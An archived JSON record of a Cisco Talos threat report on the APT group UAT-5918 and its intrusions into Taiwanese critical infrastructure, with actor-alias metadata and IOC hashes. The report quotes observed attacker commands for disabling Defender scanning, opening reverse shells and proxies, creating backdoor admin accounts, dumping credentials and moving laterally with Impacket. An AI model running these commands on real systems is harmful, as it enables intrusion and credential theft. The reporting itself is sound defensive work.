{ "id": "01792c3f-4a02-4afd-bce2-27679db52091", "created_at": "2026-04-06T00:16:30.729552Z", "updated_at": "2026-04-10T03:34:44.495293Z", "deleted_at": null, "sha1_hash": "24f745594ec13d4635c14e424343c37df2ad3dcf", "title": "UAT-5918 targets critical infrastructure entities in Taiwan", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 671675, "plain_text": "UAT-5918 targets critical infrastructure entities in Taiwan\r\nBy Jungsoo An\r\nPublished: 2025-03-20 · Archived: 2026-04-05 15:39:03 UTC\r\nCisco Talos discovered a malicious campaign we track under the UAT-5918 umbrella that has been active\r\nsince at least 2023. \r\nUAT-5918, a threat actor believed to be motivated by establishing long-term access for information theft,\r\nuses a combination of web shells and open-sourced tooling to conduct post-compromise activities to\r\nestablish persistence in victim environments for information theft and credential harvesting. \r\nWe assess that UAT-5918's post-compromise activity, tactics, techniques, and procedures (TTPs), and\r\nvictimology overlaps the most with Volt Typhoon, Flax Typhoon, Earth Estries, and Dalbit intrusions\r\nwe’ve observed in the past.\r\nUAT-5918’s activity cluster\r\nOverview \r\nTalos assesses with high confidence that UAT-5918 is an advanced persistent threat (APT) group that targets\r\nentities in Taiwan to establish long-term persistent access in victim environments. UAT-5918 usually obtains\r\ninitial access by exploiting N-day vulnerabilities in unpatched web and application servers exposed to the internet.\r\nThe threat actor will subsequently use a plethora of open-source tools for network reconnaissance to move\r\nthrough the compromised enterprise. \r\nThe activity that we monitored suggests that the post-compromise activity is done manually with the main goal\r\nbeing information theft. Evidently, it also includes deployment of web shells across any discovered sub-domains\r\nand internet-accessible servers to open multiple points of entry to the victim organizations. UAT-5918's intrusions\r\nharvest credentials to obtain local and domain level user credentials and the creation of new administrative user\r\naccounts to facilitate additional channels of access, such as RDP to endpoints of significance to the threat actor.\r\nTypical tooling used by UAT-5918 includes networking tools such as FRPC, FScan, In-Swor, Earthworm, and\r\nNeo-reGeorg. Credential harvesting is accomplished by dumping registry hives, NTDS, and using tools such as\r\nMimikatz and browser credential extractors. These credentials are then used to perform lateral movement via\r\neither RDP, WMIC (PowerShell remoting), or Impacket. \r\nUAT-5918 activity cluster overlapping \r\nUAT-5918's tooling and TTPs overlap substantially with several APT groups including Volt Typhoon, Flax\r\nTyphoon and Dalbit. \r\nhttps://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/\r\nPage 1 of 12\n\nFigure 1. UAT-5918 TTPs and tooling overlaps with similar APT groups.\r\nThere is a significant overlap in post-compromise tooling and TTPs with Volt Typhoon, such as using ping and\r\ntools like In-Swor for network discovery; gathering system information such as drive and partition; gathering\r\nlogical drive information such as names, IDs, size, and free spaces; credential dumping from web browser\r\napplications; using open-source tools such as frp, Earthworm, and Impacket for establishing control channels; and\r\nthe absence of custom-made malware. The U.S. government assesses that Volt Typhoon is a PRC state-sponsored\r\nactor conducting cyberattacks against U.S. critical infrastructure. \r\nMultiple tools used in this intrusion also overlap with tooling used by Flax Typhoon in the past, such as the\r\nChopper web shell, Mimikatz, JuicyPotato, Metasploit, WMIC and PowerShell, along with the use of tactics such\r\nas relying on RDP and other web shells to persist in the enterprise and WMIC for gathering system information.\r\nThe U.S. government attributes Flax Typhoon, a Chinese government-sponsored threat actor, to the Integrity\r\nTechnology Group, a PRC-based company.\r\nAdditionally, tooling such as FRP, FScan, In-Swor, and Neo-reGeorg, as well as filepaths and names used by\r\nUAT-5918, overlap with those used by Tropic Trooper. Tropic Trooper’s malware suite, specifically Crowdoor\r\nLoader and SparrowDoor, overlap with the threat actors known as Famous Sparrow and Earth Estries. We have\r\nalso observed overlaps in tooling and tactics used in this campaign operated by UAT-5918 and in operations\r\nconducted by Earth Estries, including the use of FRP, FScan, Webshells, Impacket, living-off-the-land binaries\r\nhttps://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/\r\nPage 2 of 12\n\n(LoLBins), etc. Furthermore, we’ve discovered similar tooling between UAT-5918 and Dalbit consisting of port\r\nscanners, proxying tools, reverse shells, and reconnaissance TTPs.\r\nIt is worth noting that a sub-set of tools UAT-5918 uses such as LaZagne, SNetCracker, PortBrute, NetSpy etc.,\r\nhave not been seen being used by the aforementioned threat actors in public reporting. It is highly likely that this\r\ntooling might be exclusively used by UAT-5918 or their usage by other related groups may have been omitted in\r\npublicly available disclosures. \r\nVictimology and targeted verticals \r\nUAT-5918 also overlaps with the previously mentioned APT groups in terms of targeted geographies and industry\r\nverticals, indicating that this threat actor’s operations align with the strategic goals of the aforementioned set of\r\nthreat actors. \r\nWe have primarily observed targeting of entities in Taiwan by UAT-5918 in industry verticals such as\r\ntelecommunications, healthcare, information technology, and other critical infrastructure sectors. Similar verticals\r\nand geographies have also been targeted by APT groups such as Volt Typhoon, Flax Typhoon, Earth Estries,\r\nTropic Trooper, and Dalbit. \r\nInitial access and reconnaissance \r\nUAT-5918 typically gains initial access to their victims via exploitation of known vulnerabilities on unpatched\r\nservers exposed to the internet. Activity following a successful compromise consists of preliminary\r\nhttps://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/\r\nPage 3 of 12\n\nreconnaissance to identify users, domains, and gather system information. Typical commands executed on\r\nendpoints include: \r\nping \u003cIP\u003e\r\nnet user\r\nsysteminfo\r\narp –a\r\nroute print\r\ntasklist\r\ntasklist -v\r\nnetstat -ano\r\nwhoami\r\nipconfig\r\nquery user\r\ncmd /c dir c:\\users\\\u003cusername\u003e\\Desktop\r\ncmd /c dir c:\\users\\\u003cusername\u003e\\Documents\r\ncmd /c dir c:\\users\\\u003cusername\u003e\\Downloads\r\n Initial credential reconnaissance is carried out using the cmdkey command: \r\ncmdkey /list\r\nThe threat actor then proceeds to download and place publicly available red-teaming tools (illustrated in\r\nsubsequent sections) on endpoints to carry out further actions. In some cases, UAT-5918 also disabled Microsoft\r\nDefender’s scanning of their working directories on disk: \r\npowershell.exe -exec bypass Add-MpPreference -ExclusionPath \u003cworking_directory\u003e\r\npowershell Get-MpPreference\r\nPost-compromise tooling \r\nUAT-5918's post-compromise tooling consists of web shells, some of which are publicly available, such as the\r\nChopper web shell, multiple red-teaming and network scanning tools, and credentials harvesters.\r\nReverse proxies and tunnels \r\nThe actor uses FRP and Neo-reGeorge to establish reverse proxy tunnels for accessing compromised endpoints via\r\nattacker controlled remote hosts. The tools are usually downloaded as archives and extracted before execution:\r\nhttps://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/\r\nPage 4 of 12\n\nThe Earthworm (ew) tool for establishing proxies is also run: \r\nPort scanning \r\nFScan is a port and vulnerability scanning tool that can scan ranges of IP addresses and Ports specified by the\r\nattackers:\r\nTalos has observed the actor scanning of these ports in particular: \r\nhttps://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/\r\nPage 5 of 12\n\n21 22 80 81 83 91 135 443 445 888 808 889 5432 8000 8080 54577 11211\r\nThe threat actor also relies extensively on the use of In-Swor, a publicly available tool authored and documented\r\nby Chinese speaking individuals, for conducting port scans across ranges of IP addresses. A sample command of\r\nIn-Swor's use is: \r\nRun[.]exe -h \u003cip_range\u003e/24 -nopoc -pwdf pw[.]txt -p 1521,6379 -t 4\r\nIn-Swor was used to scan for the following ports across IP address ranges: \r\n22 SSH\r\n80 HTTP\r\n135 RPC\r\n445 SMB\r\n1433 SQL server\r\n1521 Oracle DBs\r\n3306 MySQL\r\n3389 RDP\r\n4194 Kubernetes?\r\n5432 PostgreSQL\r\n5900 VNC\r\n6379 Redis\r\n10248 ?\r\n10250 Kubernetes\r\n10255 MongoDB\r\nIn other instances, In-Swor was used to establish proxy channels:\r\nsvchost[.]exe proxy -l *:22 -k 9999\r\nsvchost[.]exe proxy -l *:443 -k 9999\r\nsvchost[.]exe proxy -hc -l *:443 -k 99997654\r\nsvchost[.]exe -hc proxy -l *:443 -k 99997654\r\nsvchost[.]exe proxy -l 443 –v\r\n svchost[.]exe -type server -proto tcp -listen :443\r\nsvchost[.]exe -type server -proto http -listen :443\r\nsvchost[.]exe -type server -proto rhttp -listen :443\r\nIn addition to FScan, PortBrute, another password brute forcer for multiple protocols such as FTP, SSH, SMB,\r\nMYSQL, MONGODB, etc., was also downloaded and used:\r\nPortBruteWin(5).exe -up \u003cusername\u003e:\u003cpassword\u003e\r\nhttps://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/\r\nPage 6 of 12\n\nAdditional network reconnaissance \r\nThe threat actor uses two utilities for monitoring the current connection to the compromised hosts — NirSoft's\r\nCurrPorts utility and TCPView. Both tools are likely used to perform additional network discovery to find\r\naccessible hosts to pivot to: \r\nC:\\Users\\\u003ccompromised_user\u003e\\Desktop\\cports-x64/cports.exe\r\nC:\\Users\\\u003ccompromised_user\u003e\\Desktop\\TCPView\\tcpview64.exe\r\nThe threat actor also uses PowerShell-based scripts to attempt SMB logins to specific endpoints already identified\r\nby them:\r\npowershell[.]exe -file C:\\ProgramData\\smblogin-extra-mini.ps1\r\nNetspy, another tool authored and documented by Chinese speaking individuals, is a network segmentation\r\ndiscovery tool that UAT-5918 employs occasionally for discovery. The fact that the operator had to check the tool\r\nhelp denotes the lack of automation and the unusual usage of such tool:\r\nnetspy[.]exe -h\r\nGathering local system information \r\nThe attackers may also gather commands to profile the endpoint and its drives:\r\nwmic diskdrive get partitions /value\r\nfsutil fsinfo drives\r\nwmic logicaldisk get DeviceID,VolumeName,Size,FreeSpace\r\nwmic logicaldisk get DeviceID,VolumeName,Size,FreeSpace /format:value\r\nMaintaining persistent access to victims \r\nThe threat actor attempts to deploy multiple web shells on systems they find are hosting web applications. The\r\nweb shells are typically ASP or PHP-based files placed deep inside housekeeping directories such as image\r\ndirectories, user files etc. \r\nThe threat actor uses JuicyPotato’s (a privilege escalation tool) web shell variant that allows JuicyPotato to act as\r\na web shell on the compromised system accepting commands from remote systems to execute:\r\nhttps://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/\r\nPage 7 of 12\n\nJuicyPotato is then run to spawn cmd[.]exe to run a reverse shell that allows the threat actor to run arbitrary\r\ncommands: \r\nRun.exe -t t -p c:\\windows\\system32\\cmd.exe -l 1111 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}\r\nUAT-5918 will also use PuTTY’s pscp tool to connect to and deliver additional web shells to accessible endpoints\r\n(likely servers) within the network:\r\npscp[.]exe \u003cweb_shell\u003e \u003cuser\u003e@\u003cIP\u003e:/var/www/html/\u003cweb_shell\u003e\r\nFurthermore, Talos has observed UAT-5918 execute reverse Meterpreter shells to maintain persistent access to the\r\ncompromised hosts:\r\nC:\\ProgramData\\bind.exe\r\nC:\\ProgramData\\microbind.exe\r\nC:\\ProgramData\\reverse.exe\r\ncmd /c C:/ProgramData/microbind.exe\r\nBackdoored user account creation \r\nUAT-5918 regularly creates and assigns administrative privileges to user accounts they’ve created on\r\ncompromised endpoints: \r\nnet user \u003cvictimname_username\u003e \u003cpassword\u003e /add\r\nnet localgroup administrators \u003cusername\u003e /add\r\nnet group domain admins \u003cusername\u003e /add /domain\r\nCredential harvesting is a key tactic in UAT-5918 intrusions, instrumented via the use of tools such as Mimikatz,\r\nLaZagne, and browser credential stealers: \r\nMimikatz: A commonly used credential extractor tool is run to obtain credentials from the endpoint:\r\nhttps://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/\r\nPage 8 of 12\n\nLaZagne: LaZagne is an open-sourced credential extractor: \r\nC:/ProgramData/LaZagne.exe\r\nC:/ProgramData/LaZagne.exe -all \u003e\u003e laz.txt\r\nRegistry dumps: The “reg” system command is used to take dumps of the SAM, SECURITY and SYSTEM\r\nhives:\r\nGoogle Chrome information: The adversary also uses a tool called BrowserDataLite, a tool to extract Login\r\ninformation, cookies, and browsing history from web browsers. The extracted information is subsequently\r\naccessed via notepad[.]exe: \r\nBrowserDataLite_x64.exe\r\n C:\\Windows\\system32\\NOTEPAD.EXE Chrome_LoginPass.txt\r\nC:\\Windows\\system32\\NOTEPAD.EXE Chrome_Cookies.txt\r\nC:\\Windows\\system32\\NOTEPAD.EXE Chrome_History.txt\r\nhttps://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/\r\nPage 9 of 12\n\nSNETCracker: A .NET-based password cracker (brute forcer) for services such as SSH, RDP, FTP, MySQL,\r\nSMPT, Telnet, VNC, etc.: \r\nFinding strings related to credentials such as: \r\nfindstr /s /i /n /d:C:\\ password *.conf\r\nPivoting to additional endpoints \r\nUAT-5918 consistently attempts to gain access to additional endpoints within the enterprise. They will perform\r\nnetwork reconnaissance cyclically to discover new endpoints worth pivoting to and make attempts to gain access\r\nvia RDP or Impacket: \r\nmstsc.exe -v \u003chostname\u003e\r\nImpacket was also used on multiple occasions to pivot into additional endpoints and copy over tools: \r\npython wmiexec[.]py Administrator:\u003cpassword\u003e@\u003cIP\u003e -codec big5 1\u003e [\\][\\]127[.]0[.]0[.]1\\ADMIN$\\__\u003ctime\r\n cmd[.]exe /Q /c echo python wmiexec[.]py Administrator:\u003cpassword\u003e@\u003cIP\u003e -codec big5 ^\u003e \\\\\u003chostname\u003e\\C\r\n cmd[.]exe /Q /c net use [\\][\\]\u003cIP\u003e\\c$ /user:\u003cusername\u003e 1\u003e [\\][\\]127[.]0[.]0[.]1\\\u003cshare\u003e__ 2\u003e\u00261\r\ncmd[.]exe /Q /c dir [\\]\\[\\]\u003cIP\u003e\\c$ 1\u003e [\\][\\]127[.]0[.]0[.]1\\\u003cshare\u003e__ 2\u003e\u00261\r\ncmd[.]exe /Q /c copy fscan64[.]exe [\\][\\]\u003cIP\u003e\\c$\\ 1\u003e [\\][\\]127[.]0[.]0[.]1\\\u003cshare\u003e__ 2\u003e\u00261\r\ncmd[.]exe /Q /c copy [\\][\\]\u003cIP\u003e\\c$\\\u003cscan_result\u003e.txt 1\u003e [\\][\\]127[.]0[.]0[.]1\\\u003cshare\u003e__ 2\u003e\u00261\r\ncmd[.]exe /Q /c copy fscan[.]exe [\\][\\]\u003cIP\u003e\\c$\\ 1\u003e [\\][\\]127[.]0[.]0[.]1\\\u003cshare\u003e__ 2\u003e\u00261\r\ncmd[.]exe /Q /c copy mimikatz[.]exe [\\][\\]\u003cIP\u003e\\c$ 1\u003e [\\][\\]127[.]0[.]0[.]1\\\u003cshare\u003e__ 2\u003e\u00261\r\nFile collection and staging \r\nUAT-5918 pivots across endpoints enumerating local and shared drives to find data of interest to the threat actor.\r\nThis data may include everything that furthers the APT’s strategic and tactical goals and ranges from confidential\r\ndocuments, DB exports and backups to application configuration files. In one instance, the threat actor used the\r\nSQLCMD[.]exe utility to create a database backup that could be exfiltrated: \r\nhttps://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/\r\nPage 10 of 12\n\nC:/ProgramData/SQLCMD.EXE -S \u003ctarget_server_DB\u003e -U \u003cusername\u003e -P \u003cpassword\u003e -Q BACKUP DATABASE \u003cNAME\u003e\r\nCoverage \r\nWays our customers can detect and block this threat are listed below. \r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nCisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.\r\nSecure Access provides seamless transparent and secure access to the internet, cloud services or private\r\napplication no matter where your users work. Please contact your Cisco account representative or authorized\r\npartner if you are interested in a free trial of Cisco Secure Access.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nhttps://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/\r\nPage 11 of 12\n\nIOCs \r\nIOCs for this research can also be found at our GitHub repository here. \r\n6F6F7AA6144A1CFE61AC0A80DB7AD712440BDC5730644E05794876EB8B6A41B4\r\nBAB01D029556CF6290F6F21FEC5932E13399F93C5FDBCFFD3831006745F0EB83\r\nF7F6D0AFB300B57C32853D49FF50650F5D1DC7CF8111AA32FF658783C038BFE5\r\n497A326C6C207C1FB49E4DAD81D051FCF6BCBE047E0D3FE757C298EF8FE99ABA\r\nF9EB34C34E4A91630F265F12569F70B83FEBA039C861D6BF906B74E7FB308648\r\nDD832C8E30ED50383495D370836688EE48E95334270CBBCE41109594CB0C9FD1\r\nF7B52EE613F8D4E55A69F0B93AA9AA5472E453B0C458C8390DB963FF8B0B769C\r\nB994CBC1B5C905A2B731E47B30718C684521E8EC6AFB601AFECF30EF573E5153\r\n12D4EFE2B21B5053A3A21B49F25A6A4797DC6E9A80D511F29CA67039BA361F63\r\n2272925B1E83C7C3AB24BDEB82CE727DB84F5268C70744345CDA41B452C49E84\r\n71EB5115E8C47FFF1AB0E7ACEBAEA7780223683259A2BB1B8DB1EB3F26878CA4\r\nE159824448A8E53425B38BD11030AA786C460F956C9D7FC118B212E8CED4087A\r\n7EF22BFB6B2B2D23FE026BDFD7D2304427B6B62C6F9643EFEDDB4820EBF865AF\r\nEFC0D2C1E05E106C5C36160E17619A494676DEB136FB877C6D26F3ADF75A5777\r\nB7690c0fc9ec32e1a54663a2e5581e6260fe9318a565a475ee8a56c0638f38d0\r\nA774244ea5d759c4044aea75128a977e45fd6d1bb5942d9a8a1c5d7bff7e3db9\r\n31742ab79932af3649189b9287730384215a8dccdf21db50de320da7b3e16bb4\r\n09cea8aed5c58c446e6ef4d9bb83f7b5d7ba7b7c89d4164f397d378832722b69\r\nD47e35baee57eb692065a2295e3e9de40e4c57dba72cb39f9acb9f564c33b421\r\n1753fa34babeeee3b20093b72987b7f5e257270f86787c81a556790cb322c747\r\nF4ea99dc41cb7922d01955eef9303ec3a24b88c3318138855346de1e830ed09e\r\n5b0f8c650f54f17d002c01dcc74713a40eccb0367357d3f86490e9d17fcd71e8\r\n3588bda890ebf6138a82ae2e4f3cd7234ec071f343c9f5db5a96a54734eeaf9f\r\n95eee44482b4226efe3739bed3fa6ce7ae7db407c1e82e988f27cd27a31b56a6\r\n02ab315e4e3cf71c1632c91d4914c21b9f6e0b9aa0263f2400d6381aab759a61\r\nD1825cd7a985307c8585d88d247922c3a51835f9338dc76c10cdbad859900a03\r\n234899dea0a0e91c67c7172204de3a92a4cbeef37cdc10f563bf78343234ad1d\r\n8d440c5f0eca705c6d27aa4883c9cc4f8711de30fea32342d44a286b362efa9a\r\nFfb8db57b543ba8a5086640a0b59a5def4929ad261e9f3624b2c0a22ae380391\r\nSource: https://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/\r\nhttps://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "ETDA", "Malpedia" ], "references": [ "https://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/" ], "report_names": [ "uat-5918-targets-critical-infra-in-taiwan" ], "threat_actors": [ { "id": "846522d7-29cb-4a0c-8ebe-ffba7429e2d7", "created_at": "2023-06-23T02:04:34.793629Z", "updated_at": "2026-04-10T02:00:04.971054Z", "deleted_at": null, "main_name": "Volt Typhoon", "aliases": [ "Bronze Silhouette", "Dev-0391", "Insidious Taurus", "Redfly", "Storm-0391", "UAT-5918", "UAT-7237", "UNC3236", "VOLTZITE", "Vanguard Panda" ], "source_name": "ETDA:Volt Typhoon", "tools": [ "FRP", "Fast Reverse Proxy", "Impacket", "LOLBAS", "LOLBins", "Living off the Land" ], "source_id": "ETDA", "reports": null }, { "id": "f67fb5b3-b0d4-484c-943e-ebf12251eff6", "created_at": "2022-10-25T16:07:23.605611Z", "updated_at": "2026-04-10T02:00:04.685162Z", "deleted_at": null, "main_name": "FamousSparrow", "aliases": [ "Earth Estries" ], "source_name": "ETDA:FamousSparrow", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "09031838-56db-4676-a2b2-4bc50d8b7b0b", "created_at": "2024-01-23T13:22:35.078612Z", "updated_at": "2026-04-10T02:00:03.519282Z", "deleted_at": null, "main_name": "Flax Typhoon", "aliases": [ "Ethereal Panda", "Storm-0919" ], "source_name": "MISPGALAXY:Flax Typhoon", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bcf899bb-34bb-43e1-929d-02bc91974f2a", "created_at": "2023-02-18T02:04:24.050644Z", "updated_at": "2026-04-10T02:00:04.639142Z", "deleted_at": null, "main_name": "Dalbit", "aliases": [], "source_name": "ETDA:Dalbit", "tools": [ "ASPXSpy", "ASPXTool", "Agentemis", "AntSword", "BadPotato", "BlueShell", "CHINACHOPPER", "China Chopper", "Cobalt Strike", "CobaltStrike", "EFSPotato", "FRP", "Fast Reverse Proxy", "Godzilla", "Godzilla Loader", "HTran", "HUC Packet Transmit Tool", "JuicyPotato", "LadonGo", "Metasploit", "Mimikatz", "NPS", "ProcDump", "PsExec", "Remcom", "RemoteCommandExecution", "RottenPotato", "SinoChopper", "SweetPotato", "cobeacon", "reGeorg" ], "source_id": "ETDA", "reports": null }, { "id": "86c7abc2-1b71-4665-b9e3-1594d6d15a4a", "created_at": "2023-09-07T02:02:47.367254Z", "updated_at": "2026-04-10T02:00:04.698935Z", "deleted_at": null, "main_name": "Flax Typhoon", "aliases": [ "Ethereal Panda", "RedJuliett" ], "source_name": "ETDA:Flax Typhoon", "tools": [ "BadPotato", "CHINACHOPPER", "China Chopper", "JuicyPotato", "LOLBAS", "LOLBins", "Living off the Land", "Metasploit", "Mimikatz", "SinoChopper", "SoftEther VPN" ], "source_id": "ETDA", "reports": null }, { "id": "61ea51ed-a419-4b05-9241-5ab0dbba25fc", "created_at": "2023-01-06T13:46:38.354607Z", "updated_at": "2026-04-10T02:00:02.939761Z", "deleted_at": null, "main_name": "APT23", "aliases": [ "BRONZE HOBART", "G0081", "Red Orthrus", "Earth Centaur", "PIRATE PANDA", "KeyBoy", "Tropic Trooper" ], "source_name": "MISPGALAXY:APT23", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bef7800a-a08f-4e21-b65c-4279c851e572", "created_at": "2022-10-25T15:50:23.409336Z", "updated_at": "2026-04-10T02:00:05.319608Z", "deleted_at": null, "main_name": "Tropic Trooper", "aliases": [ "Tropic Trooper", "Pirate Panda", "KeyBoy" ], "source_name": "MITRE:Tropic Trooper", "tools": [ "USBferry", "ShadowPad", "PoisonIvy", "BITSAdmin", "YAHOYAH", "KeyBoy" ], "source_id": "MITRE", "reports": null }, { "id": "a09ade2a-6b87-4f9a-b4f8-23cf14f63633", "created_at": "2023-11-04T02:00:07.676869Z", "updated_at": "2026-04-10T02:00:03.389898Z", "deleted_at": null, "main_name": "Earth Estries", "aliases": [], "source_name": "MISPGALAXY:Earth Estries", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d390d62a-6e11-46e5-a16f-a88898a8e6ff", "created_at": "2024-12-28T02:01:54.899899Z", "updated_at": "2026-04-10T02:00:04.880446Z", "deleted_at": null, "main_name": "Salt Typhoon", "aliases": [ "Earth Estries", "FamousSparrow", "GhostEmperor", "Operator Panda", "RedMike", "Salt Typhoon", "UNC2286" ], "source_name": "ETDA:Salt Typhoon", "tools": [ "Agentemis", "Backdr-NQ", "Cobalt Strike", "CobaltStrike", "Crowdoor", "Cryptmerlin", "Deed RAT", "Demodex", "FamousSparrow", "FuxosDoor", "GHOSTSPIDER", "HemiGate", "MASOL RAT", "Mimikatz", "NBTscan", "NinjaCopy", "ProcDump", "PsExec", "PsList", "SnappyBee", "SparrowDoor", "TrillClient", "WinRAR", "Zingdoor", "certutil", "certutil.exe", "cobeacon", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "a88747e2-ffed-45d8-b847-8464361b2254", "created_at": "2023-11-01T02:01:06.605663Z", "updated_at": "2026-04-10T02:00:05.289908Z", "deleted_at": null, "main_name": "Volt Typhoon", "aliases": [ "Volt Typhoon", "BRONZE SILHOUETTE", "Vanguard Panda", "DEV-0391", "UNC3236", "Voltzite", "Insidious Taurus" ], "source_name": "MITRE:Volt Typhoon", "tools": [ "netsh", "PsExec", "ipconfig", "Wevtutil", "VersaMem", "Tasklist", "Mimikatz", "Impacket", "Systeminfo", "netstat", "Nltest", "certutil", "FRP", "cmd" ], "source_id": "MITRE", "reports": null }, { "id": "7cf4ec85-806f-4fd7-855a-6669ed381bf5", "created_at": "2023-11-08T02:00:07.176033Z", "updated_at": "2026-04-10T02:00:03.435082Z", "deleted_at": null, "main_name": "Dalbit", "aliases": [], "source_name": "MISPGALAXY:Dalbit", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "49b3063e-a96c-4a43-b28b-1c380ae6a64b", "created_at": "2025-08-07T02:03:24.661509Z", "updated_at": "2026-04-10T02:00:03.644548Z", "deleted_at": null, "main_name": "BRONZE SILHOUETTE", "aliases": [ "Dev-0391 ", "Insidious Taurus ", "UNC3236 ", "Vanguard Panda ", "Volt Typhoon ", "Voltzite " ], "source_name": "Secureworks:BRONZE SILHOUETTE", "tools": [ "Living-off-the-land binaries", "Web shells" ], "source_id": "Secureworks", "reports": null }, { "id": "578f8e62-2bb4-4ce4-a8b7-6c868fa29724", "created_at": "2022-10-25T16:07:24.344358Z", "updated_at": "2026-04-10T02:00:04.947834Z", "deleted_at": null, "main_name": "Tropic Trooper", "aliases": [ "APT 23", "Bronze Hobart", "Earth Centaur", "G0081", "KeyBoy", "Operation Tropic Trooper", "Pirate Panda", "Tropic Trooper" ], "source_name": "ETDA:Tropic Trooper", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "ByPassGodzilla", "CHINACHOPPER", "CREDRIVER", "China Chopper", "Chymine", "Darkmoon", "Gen:Trojan.Heur.PT", "KeyBoy", "Neo-reGeorg", "PCShare", "POISONPLUG.SHADOW", "Poison Ivy", "RoyalRoad", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Swor", "TSSL", "USBferry", "W32/Seeav", "Winsloader", "XShellGhost", "Yahoyah", "fscan", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "86182dd7-646c-49c5-91a6-4b62fd2119a7", "created_at": "2025-08-07T02:03:24.617638Z", "updated_at": "2026-04-10T02:00:03.738499Z", "deleted_at": null, "main_name": "BRONZE HOBART", "aliases": [ "APT23", "Earth Centaur ", "KeyBoy ", "Pirate Panda ", "Red Orthrus ", "TA413 ", "Tropic Trooper " ], "source_name": "Secureworks:BRONZE HOBART", "tools": [ "Crowdoor", "DSNGInstaller", "KeyBoy", "LOWZERO", "Mofu", "Pfine", "Sepulcher", "Xiangoop Loader", "Yahaoyah" ], "source_id": "Secureworks", "reports": null }, { "id": "7074cc97-be8f-417b-8294-124c3add8668", "created_at": "2025-05-29T02:00:03.190761Z", "updated_at": "2026-04-10T02:00:03.84828Z", "deleted_at": null, "main_name": "UAT-5918", "aliases": [], "source_name": "MISPGALAXY:UAT-5918", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ea4726a4-3b7c-45db-a579-2abd4986941c", "created_at": "2025-11-01T02:04:53.002048Z", "updated_at": "2026-04-10T02:00:03.764362Z", "deleted_at": null, "main_name": "BRONZE FLAXEN", "aliases": [ "Ethereal Panda ", "Flax Typhoon " ], "source_name": "Secureworks:BRONZE FLAXEN", "tools": [ "Bad Potato", "Juicy Potato", "Metasploit", "Mimikatz", "SoftEther VPN" ], "source_id": "Secureworks", "reports": null }, { "id": "6477a057-a76b-4b60-9135-b21ee075ca40", "created_at": "2025-11-01T02:04:53.060656Z", "updated_at": "2026-04-10T02:00:03.845594Z", "deleted_at": null, "main_name": "BRONZE TIGER", "aliases": [ "Earth Estries ", "Famous Sparrow ", "Ghost Emperor ", "RedMike ", "Salt Typhoon " ], "source_name": "Secureworks:BRONZE TIGER", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "4ed2b20c-7523-4852-833b-cebee8029f55", "created_at": "2023-05-26T02:02:03.524749Z", "updated_at": "2026-04-10T02:00:03.366175Z", "deleted_at": null, "main_name": "Volt Typhoon", "aliases": [ "BRONZE SILHOUETTE", "VANGUARD PANDA", "UNC3236", "Insidious Taurus", "VOLTZITE", "Dev-0391", "Storm-0391" ], "source_name": "MISPGALAXY:Volt Typhoon", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434590, "ts_updated_at": 1775792084, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/24f745594ec13d4635c14e424343c37df2ad3dcf.pdf", "text": "https://archive.orkl.eu/24f745594ec13d4635c14e424343c37df2ad3dcf.txt", "img": "https://archive.orkl.eu/24f745594ec13d4635c14e424343c37df2ad3dcf.jpg" } }